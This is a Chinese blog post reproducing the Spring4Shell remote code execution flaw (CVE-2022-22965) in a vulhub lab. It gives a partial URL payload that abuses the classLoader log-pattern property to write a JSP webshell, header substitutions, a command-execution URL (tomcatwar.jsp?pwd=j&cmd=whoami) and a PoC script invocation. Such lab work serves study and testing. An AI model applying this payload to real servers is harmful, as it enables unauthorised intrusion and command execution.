Spring Framework远程代码执行漏洞_CVE-2022-22965复现

VSole2022-04-06 18:07:57

乌鸦安全的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。

乌鸦安全拥有对此文章的修改、删除和解释权限,如转载或传播此文章,需保证文章的完整性,未经允许,禁止转载!

本文所提供的工具仅用于学习,禁止用于其他,请在24小时内删除工具文件!!!

本文首发乌鸦安全知识星球,更新时间:2022.04.01

1. 漏洞介绍

Spring Framework是一个开源应用框架,初衷是为了降低应用程序开发的复杂度,具有分层体系结构,允许用户选择组件,同时还为 J2EE 应用程序开发提供了一个好用的框架。当Spring部署在JDK9及以上版本,远程攻击者可利用该漏洞写入恶意代码导致远程代码执行。

2. 漏洞复现

目前可以借助vulhub一键复现该漏洞:

https://github.com/vulhub/vulhub/tree/master/spring/CVE-2022-22965

在当前目录下使用命令:docker-compose up -d即可一键开启环境:

看到当前的端口开在了8080

打开页面之后,可以看到当前服务已经起来了:

http://127.0.0.1:8080/

按照作者的链接:

http://127.0.0.1:8080/?name=Bob&age=25

出现页面:

然后根据提示,构造请求地址:(方法不唯一)

http://127.0.0.1:8080/?class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25

该请求发出之后,需要进行变换:

红色部分替换为:

suffix: %>//
c1: Runtime
c2: <%
DNT: 1
Content-Length: 2

效果查看下图:

然后访问:


http://10.30.2.146:8080//tomcatwar.jsp?pwd=j&cmd=whoami

执行命令即可!

注意,在这里的多次执行会不断的往日志写文件,请勿频繁操作!

3. 工具版

工具:因为考虑到现在的大环境,这里提供的工具仅仅能够在当前环境下使用,不能在其他的环境中使用!

请在后台回复关键字:spring 下载

直接执行脚本即可:

python3 vulhub_CVE-2022-22965_poc.py --url=http://127.0.0.1:8080

执行效果:

同样,不要多次执行!

4. 注意事项

不要频繁的往里面写,不然日志文件会炸,消除方法就是使用get请求(vulhub专属),停止写日志:

http://127.0.0.1:8080/?class.module.classLoader.resources.context.parent.pipeline.first.pattern= 

漏洞spring框架
本作品采用《CC 协议》,转载必须注明作者和本文链接
虽说是 Spring 框架漏洞,但以下包含并不仅 Spring Framework,Spring Boot,还有 Spring Cloud,Spring Data,Spring Security 等。
Spring框架是一个开放源代码的J2EE应用程序框架,是针对bean的生命周期进行管理的轻量级容器。Spring可以单独应用于构筑应用程序,也可以和Struts、Webwork、Tapestry等众多Web框架组合使用,并且可以与 Swing等桌面应用程序AP组合。 Spring框架主要由七部分组成,分别是 Spring Core、 Spring AOP、 Spring ORM、 Spring
Spring核心框架存在RCE漏洞.在野曝光一段时间后,官方终于发布漏洞信息CVE-2022-22965,并并修复了漏洞。结合Tomcat属性可实现RCE。从理论上分析,Weblogic等其他Java中间件或应用程序也可能构建出完整利用链。
虽说是 Spring 框架漏洞,但以下包含并不仅 Spring Framework,Spring Boot,还有 Spring Cloud,Spring Data,Spring Security 等。 CVE-2010-1622 Spring Framework class.classLoader 类远程代码执行 影响版本:SpringSource Spring Framework 3.0.0
2021年11月30日,360漏洞云团队监测到VMware发布安全公告,修复了一个 Spring AMQP中的拒绝服务漏洞漏洞编号:CVE-2021-22095,漏洞威胁等级:中危。
Spring framework 是Spring 里面的一个基础开源框架,其目的是用于简化 Java 企业级应用的开发难度和开发周期,2022年3月31日,VMware Tanzu发布漏洞报告,Spring Framework存在远程代码执行漏洞,在 JDK 9+ 上运行的 Spring MVC 或 Spring WebFlux 应用程序可能容易受到通过数据绑定的远程代码执行 (RCE) 的攻击
建议相关用户及时开展安全自查
360漏洞云近日监测到Spring框架中存在一个严重的远程代码执行漏洞,该漏洞影响Jdk 9.0以上版本的Spring框架及其衍生框架,包括但不限于Spring Cloud、Spring Boot等。
VSole
网络安全专家